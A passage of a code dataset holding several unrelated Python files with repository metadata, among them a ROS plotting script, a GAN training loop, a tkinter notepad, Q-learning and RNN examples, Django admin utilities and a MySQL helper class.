argparse.RawDescriptionHelpFormatter\n parser = argparse.ArgumentParser(formatter_class=arg_fmt,\n description=main.__doc__,\n epilog=epilog)\n parser.add_argument(\n '-f', '--file', metavar='PATH', required=True,\n help='path to input file'\n )\n parser.add_argument(\n '-l', '--loops', type=int, default=1,\n help='number of times to loop the input file. 0=infinite.'\n )\n args = parser.parse_args(rospy.myargv()[1:])\n\n filename = Path(args.file).with_suffix('')\n\n data = np.loadtxt(args.file, skiprows=1, dtype='float', delimiter=\",\")\n\n time = data[:,0]\n joint1 = data[:,1]\n joint2 = data[:,2]\n joint3 = data[:,3]\n joint4 = data[:,4]\n joint5 = data[:,5]\n joint6 = data[:,6]\n gripper = data[:,7]\n\n # Separate plots for each joint in same figure [1,7]\n fig, axs = plt.subplots(1, 7)\n fig.set_size_inches(25, 5)\n axs[0].plot(time, joint1, c = 'b')\n axs[0].set_title('Joint 1')\n axs[1].plot(time, joint2, c = 'g')\n axs[1].set_title('Joint 2')\n axs[2].plot(time, joint3, c = 'r')\n axs[2].set_title('Joint 3')\n axs[3].plot(time, joint4, c = 'c')\n axs[3].set_title('Joint 4')\n axs[4].plot(time, joint5, c = 'm')\n axs[4].set_title('Joint 5')\n axs[5].plot(time, joint6, c = 'y')\n axs[5].set_title('Joint 6')\n axs[6].plot(time, gripper, c = 'k')\n axs[6].set_title('Gripper')\n\n for ax in axs.flat:\n ax.set(xlabel='Time (s)', ylabel='Joint Angle (rad)')\n\n # Hide x labels and tick labels for top plots and y ticks for right plots.\n for ax in axs.flat:\n ax.label_outer()\n\n fig_file = str(filename) + '_fig.png'\n plt.savefig(fig_file)\n plt.show()\n\n # Separate plots for each joint in same figure\n # fig, axs = plt.subplots(2, 3)\n # axs[0, 0].plot(time, joint1)\n # axs[0, 0].set_title('Joint 1')\n # axs[0, 1].plot(time, joint2, 'tab:orange')\n # axs[0, 1].set_title('Joint 2')\n # axs[0, 2].plot(time, joint3, 'tab:green')\n # axs[0, 2].set_title('Joint 3')\n # axs[1, 0].plot(time, joint4, 'tab:red')\n # axs[1, 0].set_title('Joint 4')\n # axs[1, 1].plot(time, joint5, 'tab:green')\n # axs[1, 1].set_title('Joint 5')\n # axs[1, 2].plot(time, joint6, 'tab:blue')\n # axs[1, 2].set_title('Joint 6')\n\n # for ax in axs.flat:\n # ax.set(xlabel='Time (s)', ylabel='Joint Angle (rad)')\n\n # for ax in axs.flat:\n # ax.label_outer()\n\n # fig_file = str(filename) + '_fig.png'\n # plt.savefig(fig_file)\n # plt.show()\n\n 
# All Joints on One Plot\n # plt.title('All Joints')\n # plt.xlabel('Time (s)')\n # plt.ylabel('Joint Angle (rad)')\n # plt.plot(time, joint1, c = 'b')\n # plt.plot(time, joint2, c = 'g')\n # plt.plot(time, joint3, c = 'r')\n # plt.plot(time, joint4, c = 'c')\n # plt.plot(time, joint5, c = 'm')\n # plt.plot(time, joint6, c = 'y')\n # plt.plot(time, gripper, c = 'k')\n\n # plt.show()\n\nif __name__ == '__main__':\n main()","repo_name":"chms-raf/raf-v2","sub_path":"scripts/LFD/plot_trajectories.py","file_name":"plot_trajectories.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35647233470","text":"from unsupervised_tools.unsupervised_utils import split_every, clamp_params, get_fake_obs_via_ECC, \\\n generation_step_and_save\nimport torch_geometric\nimport torch\n\n\ndef train_plain_gan(max_num_of_epochs, batch_size, list_of_observations, line_graphs_for_list_of_observations,\n dataset, device, N_CRITIC_STEPS, critic, ECC_nodes, ECC_edges, optimizer_critic,\n optimizer_nodes, optimizer_edges, critic_loss_log, generator_loss_log,\n rnn, output, absence_net, args, qm9_smiles):\n\n for epoch in range(max_num_of_epochs):\n # have to reset at each epoch, otherwise they run out and training stops\n iter_fake_graphs = split_every(batch_size, list_of_observations)\n iter_fake_line_graphs = split_every(batch_size, line_graphs_for_list_of_observations)\n iter_real_data = split_every(batch_size, dataset)\n\n crit_steps = 0\n\n for i in range(len(list_of_observations) // batch_size):\n\n real_batch_1 = next(iter_real_data)\n real_batch_2 = torch_geometric.data.DataLoader(real_batch_1, batch_size=batch_size, shuffle=True)\n real_batch_3 = iter(real_batch_2)\n real_batch_4 = real_batch_3.next()\n real_batch_4.to(device)\n\n nodes_batch_1 = next(iter_fake_graphs)\n edges_batch_1 = next(iter_fake_line_graphs)\n\n if crit_steps < N_CRITIC_STEPS:\n critic.train()\n critic.zero_grad()\n\n ECC_nodes.eval()\n ECC_edges.eval()\n\n clamp_params(critic)\n err_real = torch.mean(critic(real_batch_4)) # E[D(x)]\n\n fake_datalist = []\n for g_nodes, g_edges in zip(nodes_batch_1, edges_batch_1):\n fake_datalist.append(get_fake_obs_via_ECC(ECC_nodes, ECC_edges, g_nodes, g_edges, epoch))\n\n fake_dataloader_pyg = torch_geometric.data.DataLoader(fake_datalist, batch_size=batch_size, shuffle=True)\n fake_data_iterator = iter(fake_dataloader_pyg)\n batch_generated = fake_data_iterator.next()\n batch_generated.to(device)\n\n err_fake = torch.mean(critic(batch_generated)) # E[D(G(z))]\n\n critic_loss = err_fake - err_real # want this min\n critic_loss.backward() # retain_graph=True\n optimizer_critic.step()\n crit_steps += 1\n\n else:\n ECC_nodes.train()\n ECC_edges.train()\n ECC_nodes.zero_grad()\n ECC_edges.zero_grad()\n critic.eval()\n\n fake_datalist = []\n for g_nodes, g_edges in zip(nodes_batch_1, edges_batch_1):\n fake_datalist.append(get_fake_obs_via_ECC(ECC_nodes, ECC_edges, g_nodes, g_edges, epoch))\n\n fake_dataloader_pyg = torch_geometric.data.DataLoader(fake_datalist, batch_size=batch_size, shuffle=True)\n fake_data_iterator = iter(fake_dataloader_pyg)\n batch_generated = fake_data_iterator.next()\n batch_generated.to(device)\n\n output_critic_fake = critic(batch_generated)\n generator_loss = -torch.mean(output_critic_fake)\n generator_loss.backward()\n\n optimizer_nodes.step()\n optimizer_edges.step()\n crit_steps = 0\n\n critic_loss_log.info(str(epoch) + ' , ' + str(critic_loss.item()))\n 
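# WGAN objectives: the critic step minimises E[D(G(z))] - E[D(x)] with its weights clamped (an approximate 1-Lipschitz constraint), while the generator step minimises -E[D(G(z))].\n 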
generator_loss_log.info(str(epoch) + ' , ' + str(generator_loss.item()))\n\n print(\n f\"Epoch: {epoch}/{max_num_of_epochs}, batch: {i}/{len(list_of_observations) // batch_size}, Err_real - Err_fake = {critic_loss}, temp: {500 / (epoch + 1)}\")\n\n generation_step_and_save(epoch, ECC_nodes, ECC_edges, critic, rnn, output, absence_net, device,\n args,\n qm9_smiles)\n","repo_name":"marconobile/master_thesis","sub_path":"unsupervised_tools/unsupervised_training_loop.py","file_name":"unsupervised_training_loop.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15793190818","text":"def display_delete_activity():\n \"\"\"\n function that loads an html template\n\n Returns : \n -------------------------\n str : html \n \"\"\"\n html = open('application/webservice/api/templates/remove.html',\"r\")\n resu=html.read()\n return resu \n\n \ndef delete_activity(filter,value_filter):\n \"\"\"\n function that builds the right format to apply a mongodb document deletion \n\n Parameters : \n ------------------------\n filter : str attribute to filter on\n value_filter : value of the filter\n\n\n Returns : \n -------------------------\n dictionary \n \"\"\"\n filtre={}\n filtre[filter]=value_filter \n \n data={\"database\" : \"activities\",\n \"collection\" : \"user_activities\", \n \"Filter\": filtre}\n\n return data","repo_name":"thomashilger67/genielog","sub_path":"application/webservice/api/display_delete.py","file_name":"display_delete.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36952216885","text":"#!/usr/bin/python3\n\nimport random\nimport concurrent.futures as cf\n\nbuffer = []\nbuffer_size = 10\n\ncounter = 0\ninp = 0\nout = 0\n\nfor i in range(1,11):\n buffer.append(0)\n\ndef producer():\n global counter, inp, out\n\n while (True):\n while ( counter == buffer_size ):\n pass # busy-wait until there is room in the buffer\n\n item = random.randint(1,100)\n buffer[inp] = item\n\n inp = (inp + 1) % buffer_size \n \n print(\"{P\")\n counter = counter + 1\t\t# critical section\n print(\"P}\")\n\ndef consumer():\n global counter, inp, out\n\n while (True):\n while ( counter == 0 ):\n pass # busy-wait until an item is available\n\n item = buffer[out]\n\n out = (out + 1) % buffer_size\n \n print(\"{C\")\n counter = counter - 1\t\t# critical section\n print(\"C}\")\n \nexecutor = cf.ThreadPoolExecutor(max_workers=2)\n\nt1 = executor.submit(producer)\nt2 = executor.submit(consumer)\n","repo_name":"gtortone/corso-pcd","sub_path":"esercizi/me-first.py","file_name":"me-first.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72729164372","text":"__author__ = 'ESU'\n\n# Problem Solving with Algorithms and Data Structures\n# Brad Miller, David Ranum\n# http://interactivepython.org/runestone/static/pythonds/index.html\n\nfrom ch3_DataStructures import Deque\nimport unittest\n\nclass TestExamples(unittest.TestCase):\n\n def test_pal_checker_false(self):\n input_str = \"lsdkjfskf\"\n self.assertFalse(pal_checker(input_str))\n\n def test_pal_checker_true(self):\n input_str = \"radar\"\n self.assertTrue(pal_checker(input_str))\n\n\ndef pal_checker(input_str):\n char_deque = Deque()\n\n for ch in input_str:\n char_deque.addRear(ch)\n\n still_equal = True\n\n while char_deque.size() > 1 and still_equal:\n first = 
char_deque.removeFront()\n last = char_deque.removeRear()\n if first != last:\n still_equal = False\n\n return still_equal\n\n\ndef main():\n print(pal_checker(\"lsdkjfskf\"))\n print(pal_checker(\"radar\"))\n\nif __name__ == '__main__':\n # unittest.main()\n main()","repo_name":"ericsu378/Miller_Python_DS_Alg","sub_path":"Chapter3/ch13_18_deques.py","file_name":"ch13_18_deques.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40735414059","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename, askopenfilenames, asksaveasfilename\nimport os\n\n\nclass notepad(Tk):\n def __init__(self):\n super().__init__()\n self.geometry(\"550x400\")\n self.maxsize(width=550, height=400)\n self.minsize(width=250, height=280)\n self.title(\"untitled - notepad\")\n self.config(bg=\"white\")\n self.file = None\n self.sbar = Scrollbar(self)\n self.sbar.pack(side=RIGHT, fill=Y)\n self.txt = Text(self, font=\"lucida 10\")\n self.txt.pack(expand=True, fill=BOTH)\n self.txt.config(yscrollcommand=self.sbar.set)\n self.sbar.config(command=self.txt.yview)\n self.menubar()\n\n def newfile(self):\n self.title(\"untitled\")\n self.file = None\n self.txt.delete(1.0, END)\n\n def openfile(self):\n self.file = askopenfilename(defaultextension=\".txt\", filetypes=[\n (\"all Files\", \"*.*\"), (\"Text Document\", \"*.txt\")])\n if self.file == \"\":\n self.file = None\n else:\n self.txt.delete(1.0, END)\n self.title(os.path.basename(self.file))\n with open(self.file, \"r\") as f:\n f = f.read()\n self.txt.insert(1.0, f)\n\n def savefile(self):\n if self.file == None:\n self.file = asksaveasfilename(initialfile='untitled.txt', defaultextension=\".txt\", filetypes=[\n (\"all Files\", \"*.*\"), (\"Text Document\", \"*.txt\")])\n if self.file == \"\":\n self.file = None\n else:\n with open(self.file, \"w\") as f:\n f.write(self.txt.get(1.0, END))\n self.title(os.path.basename(self.file))\n\n def menubar(self):\n self.menu_b = Menu(self)\n self.filemenu = Menu(self.menu_b, tearoff=0)\n self.filemenu.add_command(label=\"New file\", command=self.newfile)\n self.filemenu.add_command(label=\"open file\", command=self.openfile)\n self.filemenu.add_command(label=\"Save as\", command=self.savefile)\n self.filemenu.add_separator()\n self.menu_b.add_cascade(label=\"File\", menu=self.filemenu)\n self.menu_b.add_command(label=\"Word Wrap\",command=self.launch)\n self.config(menu=self.menu_b)\n #######################\n def launch(self):\n root=Tk()\n root.title(\"word wrap\")\n root.geometry(\"400x320\")\n root.maxsize(width=300,height=400)\n root.config(bg=\"white\")\n self.f1=Frame(root,bg=\"white\",bd=5,width=160,height=200,cursor=\"target\",relief=RIDGE)\n ### buttons for font selection\n self.btn1=Button(self.f1,bg=\"white\",fg=\"black\",text=\"ABCDE abcd\")\n self.btn2=Button(self.f1,bg=\"white\",fg=\"black\",text=\"ABCDE abcd\")\n self.btn3=Button(self.f1,bg=\"white\",fg=\"black\",text=\"ABCDE abcd\")\n self.btn4=Button(self.f1,bg=\"white\",fg=\"black\",text=\"ABCDE abcd\")\n self.btn5=Button(self.f1,bg=\"white\",fg=\"black\",text=\"ABCDE abcd\")\n self.btn1.place(x=27,y=8)\n self.btn2.place(x=27,y=41)\n self.btn3.place(x=27,y=74)\n self.btn4.place(x=27,y=107)\n self.btn5.place(x=27,y=140)\n Label(root,text=\"select font\",bg=\"white\",fg=\"black\",font=\"roman 13 bold\").place(x=28,y=8)\n self.f1.place(x=20,y=33)\n root.mainloop()\n\n\n\n\nnote = notepad()\n# f_edit= FontEditMenu()\n# f_edit.menubarf()\n# 
f_edit.mainloop()\nnote.mainloop()\n","repo_name":"Pggeeks/tkinter-notepad","sub_path":"notepadtk.py","file_name":"notepadtk.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"35502000370","text":"class PhanSo():\n # fraction class: tu is the numerator, mau the denominator, ucln the gcd\n def __init__(self, tu, mau):\n self.tu = int(tu)\n self.mau = int(mau)\n\n def ucln(self):\n a = self.tu\n b = self.mau\n while b != 0:\n x = a % b\n a, b = b, x\n return a\n def Tu(self, PhanSo):\n return self.tu * PhanSo.mau + self.mau * PhanSo.tu\n\n def Mau(self, PhanSo):\n return self.mau * PhanSo.mau\n\n\ndef ucln(a, b):\n while b != 0:\n x = a % b\n a, b = b, x\n return a\n\narr = input().split()\nps1 = PhanSo(arr[0], arr[1])\nps2 = PhanSo(arr[2], arr[3])\ntu = ps1.Tu(ps2)\nmau = ps1.Mau(ps2)\nprint(f\"{tu//ucln(tu, mau)}/{mau//ucln(tu, mau)}\")\n\n\n\n\n","repo_name":"HieuGITLAB/CODEPTIT","sub_path":"lopphanso-2.py","file_name":"lopphanso-2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3924787015","text":"import numpy as np\r\nimport gym\r\nimport random\r\n\r\n\r\nenv = gym.make(\"FrozenLake-v0\")\r\nenv.render()\r\n\r\naction_size = env.action_space.n\r\nstate_size = env.observation_space.n\r\nqtable = np.zeros((state_size,action_size))\r\n\r\ntotal_episodes = 100000\r\ntotal_test_episodes = 1000\r\n\r\nmax_steps = 999\r\n\r\nlearning_rate = 0.7\r\ngamma = 0.95\r\nepsilon = 1.0\r\nmax_epsilon = 1.0\r\nmin_epsilon = 0.01\r\ndecay_rate = 0.01\r\n\r\n# baseline: evaluate the untrained (all-zero) Q-table first\r\naverage = 0\r\nfor episode in range(total_test_episodes):\r\n state = env.reset()\r\n step = 0\r\n done = False\r\n total_reward = 0\r\n for step in range(max_steps):\r\n action = np.argmax(qtable[state,:])\r\n newState,reward,done,_ = env.step(action)\r\n total_reward += reward\r\n state = newState\r\n if done:\r\n break\r\n average += total_reward\r\n\r\nprint(average/total_test_episodes)\r\n\r\nfor episode in range(total_episodes):\r\n state = env.reset()\r\n step = 0\r\n done = False\r\n for step in range(max_steps):\r\n randEps = random.uniform(0,1)\r\n if randEps > epsilon:\r\n action = np.argmax(qtable[state,:])\r\n else:\r\n action = env.action_space.sample()\r\n \r\n newState, reward, done, info = env.step(action)\r\n \r\n qtable[state,action] = qtable[state,action] + learning_rate * (reward + gamma*np.max(qtable[newState,:]) - qtable[state,action])\r\n \r\n state = newState\r\n \r\n if done:\r\n break\r\n \r\n epsilon = min_epsilon + (max_epsilon - min_epsilon) * np.exp(-decay_rate*episode)\r\n\r\naverage = 0\r\nfor episode in range(total_test_episodes):\r\n state = env.reset()\r\n step = 0\r\n done = False\r\n total_reward = 0\r\n for step in range(max_steps):\r\n action = np.argmax(qtable[state,:])\r\n newState,reward,done,_ = env.step(action)\r\n total_reward += reward\r\n state = newState\r\n if done:\r\n break\r\n average += total_reward\r\n\r\nprint(average/total_test_episodes)","repo_name":"m1234d/rl-projects","sub_path":"QLearning/FrozenLake/frozenlake.py","file_name":"frozenlake.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16195582396","text":"def fu(xx):\n for x in range(1, xx, 3):\n yield x\n\n\ntry:\n with open('text_5-5_nums.txt', \"w\", encoding=\"utf-8\") as new_file:\n for el in fu(20):\n print(f'{el}', end=\" \", file=new_file)\n try:\n with 
open('text_5-5_nums.txt') as num_file:\n summ = 0\n for line in num_file:\n tmp_list = map(int, line.split())\n for num in tmp_list:\n summ += num\n print(summ)\n except:\n print('Ошибка обработки файла, программа завершена !')\nexcept:\n print('Ошибка генерации файла')\n","repo_name":"tedavydov/python2020","sub_path":"Lesson5/Lesson5_DZ5.py","file_name":"Lesson5_DZ5.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3924787015","text":"import collections\nclass Solution(object):\n def shortestPathLength(self, graph):\n N = len(graph)\n queue = collections.deque((1 << x, x) for x in range(N))\n dist = collections.defaultdict(lambda: float('inf'))\n for x in range(N): dist[1 << x, x] = 0\n\n while queue:\n cover, head = queue.popleft()\n d = dist[cover, head]\n if cover == 2**N - 1: return d\n for child in graph[head]:\n cover2 = cover | (1 << child)\n if d + 1 < dist[cover2, child]:\n dist[cover2, child] = d + 1\n queue.append((cover2, child))","repo_name":"YunYouJun/LeetCode","sub_path":"problems/shortest-path-visiting-all-nodes/solution-1.py","file_name":"solution-1.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"27880417994","text":"import json\nimport datetime\nimport subprocess\nfrom models import ServerStats, AdminUsers\nfrom channels import Group, channel_layers\nfrom django.db import connection\nfrom User.userhelper import verifyPassword\nfrom Server.config import START_DATETIME\n\n\ndef login(username, password):\n\t\"\"\"\n\tAttempt to authenticate the admin user\n\t\"\"\"\n\tadmin = AdminUsers.objects.filter(username=username)\n\tif admin:\n\t\tadmin = admin[0]\n\t\treturn verifyPassword(password, admin.password)\n\n\treturn False\n\ndef send_keepalive_ping():\n\t\"\"\"\n\tHelper function to send a ping to the client.\n\tWas intended to help daphne determine which socket connections have expired.\n\tCleanup doesn't seem to be working well, this will likely go away.\n\t\"\"\"\n\tGroup(\"activeUsers\").send({\"text\": json.dumps({\"PING\": \"PING\"})})\n\ndef get_num_active_users():\n\t\"\"\"\n\tObtain the number of websockets connected to the server\n\t\"\"\"\n\treturn len(channel_layers.backends['default'].channel_layer.group_channels('activeUsers'))\n\ndef get_server_uptime():\n\t\"\"\"\n\tObtain the amount of time the server has been up and running\n\t\"\"\"\n\treturn datetime.datetime.now() - START_DATETIME\n\ndef get_local_disk_usage():\n\t\"\"\"\n\tObtains the local disk usage for the server using the df command\n\t\"\"\"\n\ttotal_disk_size = subprocess.check_output(\"df -h / | tail -1 | awk '{print $2}'\", shell=True)\n\tused_disk_amount = subprocess.check_output(\"df -h / | tail -1 | awk '{print $3}'\", shell=True)\n\n\treturn used_disk_amount, total_disk_size\n\ndef get_total_db_rows():\n\t\"\"\"\n\tCalculates the total number of rows in all of the tables\n\t\"\"\"\n\twith connection.cursor() as cursor:\n\t\tcursor.execute(\"SELECT SUM(n_live_tup) FROM (SELECT schemaname,relname,n_live_tup FROM pg_stat_user_tables ORDER BY n_live_tup DESC) asdf;\")\n\t\trow = cursor.fetchone()\n\t\trow_count = row[0]\n\n\treturn row_count\n\ndef get_all_command_perf_data():\n\t\"\"\"\n\tObtains all of the performance data for requests\n\t\"\"\"\n\trequest_duration = ServerStats.objects.filter(name='request_duration')\n\tif request_duration:\n\t\trequest_duration = 
request_duration[0]\n\t\tdata = json.loads(request_duration.value)\n\t\tcommands = []\n\t\taverage_data = {\"value\": data[\"average\"][\"value\"], \"total\": data[\"average\"][\"total\"]}\n\t\tfastest_data = {\"value\": float(\"inf\"), \"name\": None}\n\t\tslowest_data = {\"value\": -1.0, \"name\": None}\n\t\tfor cmd in data['commands']:\n\t\t\ttotal = data['commands'][cmd]['average_time']['total']\n\t\t\taverage = data['commands'][cmd]['average_time']['value']\n\t\t\tfastest = data['commands'][cmd]['fastest_time']\n\t\t\tslowest = data['commands'][cmd]['slowest_time']\n\t\t\tcommands.append({\"name\": cmd, \"total\": total, \"average\": average, \"fastest\": fastest, \"slowest\": slowest})\n\n\t\t\tif fastest < fastest_data[\"value\"]:\n\t\t\t\tfastest_data[\"value\"] = fastest\n\t\t\t\tfastest_data[\"name\"] = cmd\n\n\t\t\tif slowest > slowest_data[\"value\"]:\n\t\t\t\tslowest_data[\"value\"] = slowest\n\t\t\t\tslowest_data[\"name\"] = cmd\n\n\t\treturn commands, average_data, fastest_data, slowest_data\n\telse:\n\t\tcommands = []\n\t\taverage_data = {\"value\": \"\", \"total\": 0}\n\t\tfastest_data = {\"value\": \"\", \"name\": \"-\"}\n\t\tslowest_data = {\"value\": \"\", \"name\": \"-\"}\n\t\treturn commands, average_data, fastest_data, slowest_data\n\ndef _calculate_new_average(average, total, new_value):\n\t\"\"\"\n\tHelper function to re-calculate an average\n\t\"\"\"\n\treturn ((average * total) + new_value) / (total + 1)\n\ndef archive_request_duration(start_time, end_time, command):\n\t\"\"\"\n\tArchive request statistics for every request to the server.\n\tThis function should be run in a separate thread.\n\t\"\"\"\n\trequest_duration = ServerStats.objects.filter(name='request_duration')\n\trequest_time = (end_time - start_time) * 1000\n\n\tif request_duration:\n\n\t\t# Obtain the request_duration entry\n\t\trequest_duration = request_duration[0]\n\t\tdata = json.loads(request_duration.value)\n\n\t\t# Obtain the request average and total\n\t\taverage = float(data['average']['value'])\n\t\ttotal = int(data['average']['total'])\n\n\t\t# Calculate the new average\n\t\tdata['average']['value'] = _calculate_new_average(average, total, request_time)\n\t\tdata['average']['total'] = total + 1\n\n\t\t# First time the command is getting archived\n\t\tif not command in data['commands']:\n\t\t\tdata[\"commands\"][command] = {}\n\t\t\tdata[\"commands\"][command]['fastest_time'] = request_time\n\t\t\tdata[\"commands\"][command]['slowest_time'] = request_time\n\t\t\tdata[\"commands\"][command]['average_time'] = {\"value\": request_time, \"total\": 1}\n\n\t\t# Command has already been archived, update its data\n\t\telse:\n\t\t\t# Calculate whether the request sets a fastest or slowest record for the command\n\t\t\tfastest_time = float(data[\"commands\"][command]['fastest_time'])\n\t\t\tslowest_time = float(data[\"commands\"][command]['slowest_time'])\n\t\t\tif request_time < fastest_time:\n\t\t\t\tdata[\"commands\"][command]['fastest_time'] = request_time\n\t\t\telif request_time > slowest_time:\n\t\t\t\tdata[\"commands\"][command]['slowest_time'] = request_time\n\n\t\t\t# Re-calculate the average request time for the command\n\t\t\taverage_time = float(data[\"commands\"][command]['average_time']['value'])\n\t\t\ttotal = int(data[\"commands\"][command]['average_time']['total'])\n\t\t\tdata[\"commands\"][command]['average_time']['total'] = total + 1\n\t\t\tdata[\"commands\"][command]['average_time']['value'] = _calculate_new_average(average_time, total, request_time)\n\n\telse:\n\t\t# Request 
stats don't exist, create an entry for it\n\t\trequest_duration = ServerStats()\n\t\trequest_duration.name = 'request_duration'\n\n\t\tdata = {\n\t\t\t\"average\": {\"value\": request_time, \"total\": 1},\n\t\t\t\"commands\": {command: {\"fastest_time\": request_time, \"slowest_time\": request_time, \"average_time\": {\"value\": request_time, \"total\": 1}}}\n\t\t}\n\n\t# Update the stats data\n\trequest_duration.value = json.dumps(data)\n\trequest_duration.save()","repo_name":"DBN16CO/Tactics","sub_path":"Server/Admin/admin_utils.py","file_name":"admin_utils.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"71741501974","text":"# https://msiqoc.tistory.com/28\n\nfrom itertools import combinations\n\ndef solution(relation):\n answer = 0\n rows = len(relation)\n cols = len(relation[0])\n \n # uniqueness: keep attribute combinations that identify every row\n candidates = []\n for i in range(1, cols+1):\n candidates.extend(combinations(range(cols), i)) \n \n final = []\n for c in candidates:\n tmp = [tuple(item[key] for key in c) for item in relation] \n if len(set(tmp)) == rows:\n final.append(c)\n \n answer = set(final) \n \n # minimality: drop any candidate that contains a smaller candidate key\n for i in range(len(final)):\n for j in range(i+1, len(final)):\n if len(final[i]) == len(set(final[i]).intersection(set(final[j]))):\n answer.discard(final[j])\n \n return len(answer)","repo_name":"devyuseon/problem-solving","sub_path":"programmers/2019_kakao_blind/후보키.py","file_name":"후보키.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29402551658","text":"import pandas as pd\r\nimport numpy as np\r\nfrom tensorflow.python.keras.models import Sequential\r\nfrom tensorflow.python.keras.layers import Dense,Dropout,SimpleRNN\r\nfrom preprocess import *\r\n\r\n\r\ndef RNN_base(hidden_units:int, dense_units:int, X_train:pd.DataFrame):\r\n model = Sequential()\r\n # 1st RNN layer and Dropout regularization\r\n # model.add(SimpleRNN(units=50, activation='relu', return_sequences=True, input_shape=(x_train_.shape[1], 1)))\r\n model.add(SimpleRNN(units=50, activation='relu', return_sequences=True, input_shape=(X_train.shape[1], 1))) # input_shape is the shape of one sample, not the data itself\r\n model.add(Dropout(0.2))\r\n # 2nd RNN layer and Dropout regularization\r\n model.add(SimpleRNN(units=50, activation='relu', return_sequences=True))\r\n model.add(Dropout(0.2))\r\n # 3rd RNN layer and Dropout regularization\r\n model.add(SimpleRNN(units=50, activation='relu', return_sequences=True))\r\n model.add(Dropout(0.2))\r\n # 4th RNN layer and Dropout regularization\r\n model.add(SimpleRNN(units=50))\r\n model.add(Dropout(0.2))\r\n # output layer\r\n model.add(Dense(units=1, activation='sigmoid'))\r\n\r\n return model\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"JumpyzZ/CS760_IoT_Traffic_Classification","sub_path":"RNN.py","file_name":"RNN.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73736789652","text":"import mysql.connector\nfrom Classes.constants import CREDENTIALS\n\n\nclass Sql:\n \"\"\"\n This class manages all interactions with the db\n \"\"\"\n\n\n def __init__(self):\n \"\"\"\n Constructor of the class, which initialises the connection to the db\n \"\"\"\n self.mydb = mysql.connector.connect(\n host=CREDENTIALS[\"host\"],\n user=CREDENTIALS[\"username\"],\n passwd=CREDENTIALS[\"password\"],\n database=CREDENTIALS[\"dbname\"]\n 
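# CREDENTIALS (imported from Classes.constants) is assumed to be a dict shaped like this sketch; the actual constants file is not shown here:\n # CREDENTIALS = {\"host\": \"localhost\", \"username\": \"root\", \"password\": \"...\", \"dbname\": \"mydatabase\"}\n 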
)\n self.mycursor = self.mydb.cursor(buffered=True)\n \"\"\"self.reset_database()\"\"\"\n\n def create_new_category(self, name):\n \"\"\"\n Create a new entry in the CATEGORIES table\n \"\"\"\n query = \"INSERT INTO Categories(nom) VALUES (%s)\"\n self.mycursor.execute(query, (name,))\n self.mydb.commit()\n return self.mycursor.lastrowid\n\n def create_new_product(self, name, grade, url, stores, id_category):\n \"\"\"\n Create a new entry in the PRODUCT table\n \"\"\"\n query = \"INSERT INTO Products(nom, grade, url, stores, id_categories) VALUES (%s, %s, %s, %s, %s)\"\n self.mycursor.execute(query, (name, grade, url, stores, id_category,))\n self.mydb.commit()\n\n def create_new_substitute(self, id_product, id_substitute_product):\n \"\"\"\n Create a new entry in the SUBSTITUTE table\n \"\"\"\n query = \"INSERT INTO Substitute(id_product, id_substitute_product) VALUES (%s, %s)\"\n self.mycursor.execute(query, (id_product, id_substitute_product,))\n self.mydb.commit()\n\n def suggest(self, id_categories):\n \"\"\"\n Return the first product with \"a\" grade in the same chosen product category\n \"\"\"\n query = \"SELECT * FROM products WHERE grade = 'a' AND id_categories = %s \"\n self.mycursor.execute(query, (id_categories,))\n return self.mycursor.fetchone()\n\n def get_product_name_by_id(self, id_product):\n \"\"\"\n Return the name of the product for the given id\n \"\"\"\n query = \"SELECT nom FROM products WHERE id_product = %s\"\n self.mycursor.execute(query, (id_product,))\n return self.mycursor.fetchone()\n\n def get_all_substitute(self):\n \"\"\"\n Return all substitute from the table SUBSTITUTE\n \"\"\"\n query = \"SELECT * FROM substitute \"\n self.mycursor.execute(query)\n return self.mycursor.fetchall()\n\n def suggest_all_categories(self):\n \"\"\"\n Return all the products where grade = \"a\"\n \"\"\"\n query = \"SELECT * FROM products WHERE grade = 'a'\"\n self.mycursor.execute(query)\n return self.mycursor.fetchone()\n\n def get_categories(self):\n \"\"\"\n Return all categories in the table CATEGORIES\n \"\"\"\n query = \"SELECT * FROM categories\"\n self.mycursor.execute(query)\n return self.mycursor.fetchall()\n\n def get_products_by_cat(self, id_categories):\n \"\"\"\n Return all product for the given category id\n \"\"\"\n query = \"SELECT * FROM products WHERE id_categories = %s\"\n self.mycursor.execute(query, (id_categories,))\n return self.mycursor.fetchall()\n\n def reset_database(self):\n \"\"\"\n Drop and reset the database from scratch by creating the 3 tables after deleting them\n \"\"\"\n # Reset Database + Création Database (pour reboot) #\n\n self.mycursor.execute(\"DROP DATABASE IF exists mydatabase\")\n self.mycursor.execute(\"CREATE DATABASE IF NOT exists 